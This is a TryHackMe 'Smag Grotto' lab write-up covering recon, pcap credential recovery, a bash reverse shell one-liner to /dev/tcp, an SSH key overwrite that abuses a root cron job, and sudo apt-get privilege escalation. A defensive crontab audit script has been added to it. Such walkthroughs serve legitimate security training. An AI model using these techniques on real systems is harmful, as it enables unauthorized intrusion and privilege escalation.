TryHackMe: Smag Grotto

Today we will take a look at TryHackMe: Smag Grotto. My goal in sharing this writeup is to show you the way if you are in trouble. Please try to understand each step and take notes.

Recon:

  • Network scan

Command: sudo nmap -sS -sC -sV -oN nmap/initial 10.10.240.21

  • Gobuster

Command: gobuster dir -u http://10.10.240.21 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -t 64

We found a directory here.

Let's check it.

We see a file with the .pcap extension. Let's download and analyze it.

The capture contains the host, the username and the password. Let's go to that directory and log in.

Enumeration

On the page that opened, I first did a ping check. Then I used it to get a reverse shell.

Command: bash -c 'bash -i >& /dev/tcp/IP/4242 0>&1'

As soon as I got in, the first thing I looked at was the cron jobs. As you can see, the cron job takes Jake's backup SSH public key and adds it to authorized_keys. If we generate our own key pair and replace the backup file with our public key, we can access the server as jake.

Command: ssh-keygen -f key

Let's overwrite the backup file on the server with the contents of our public key (key.pub):

Command: echo '<contents of key.pub>' > file

Now let's log in:

Command: ssh jake@IP -i key
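The foothold above rests on one misconfiguration: a root cron job appends a key file that a low-privileged user can modify into authorized_keys. As an added example (not part of the writeup), the audit helper below scans a crontab for that pattern; the crontab lines and key files are constructed, and the script assumes a Linux system with GNU or busybox stat.

```shell
#!/bin/sh
# Added audit helper (not from the writeup): flag cron jobs that feed a
# "backup" public key file into an authorized_keys file when that source
# file (or its directory) can be changed by someone other than the trusted
# owner. Assumes GNU/busybox stat (-c '%u' and '%a').

# key_file_tamperable FILE TRUSTED_UID
# Returns 0 if FILE is owned by another uid, is group/world-writable, or
# lives in a directory with those properties (so it could be replaced).
key_file_tamperable() {
  local f="$1" trusted="$2" owner mode
  [ -e "$f" ] || return 1               # nothing to audit if it is missing
  owner=$(stat -c '%u' "$f")
  mode=$(stat -c '%a' "$f")             # e.g. 644, 666, 1777
  [ "$owner" = "$trusted" ] || return 0
  case "$mode" in
    *[2367][0-7]|*[2367]) return 0 ;;   # group or other write bit is set
  esac
  [ -d "$f" ] && return 1               # directory passed: stop here
  key_file_tamperable "$(dirname "$f")" "$trusted"
}

# cron_key_risks CRONTAB_FILE [TRUSTED_UID]
# Prints each risky job and returns 1 if any were found, 0 otherwise.
# TRUSTED_UID defaults to 0 (root), the user system cron jobs run as.
cron_key_risks() {
  local crontab="$1" trusted="${2:-0}" risky=0 line tok
  set -f                                # keep '*' schedule fields unglobbed
  while IFS= read -r line; do
    case "$line" in ''|'#'*) continue ;; esac
    case "$line" in *authorized_keys*) ;; *) continue ;; esac
    # every absolute path in the command other than the target is a source
    for tok in $line; do
      case "$tok" in /*) ;; *) continue ;; esac
      case "$tok" in *authorized_keys*) continue ;; esac
      if key_file_tamperable "$tok" "$trusted"; then
        printf 'RISK: %s is tamperable; used by: %s\n' "$tok" "$line"
        risky=1
      fi
    done
  done < "$crontab"
  set +f
  return "$risky"
}
```

Run it as `cron_key_risks /etc/crontab` (and against the files under /etc/cron.d) on a host; a clean result means every key file fed into authorized_keys is root-owned and not writable by anyone else.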

Privilege Escalation

Let's list the commands we are allowed to run with sudo -l. We can escalate privileges with apt-get.

And now we are root.

"If you have any questions or comments, please do not hesitate to write. Have a good day."


Hello, my name is Elman. I am from Azerbaijan. I wish you a good day.
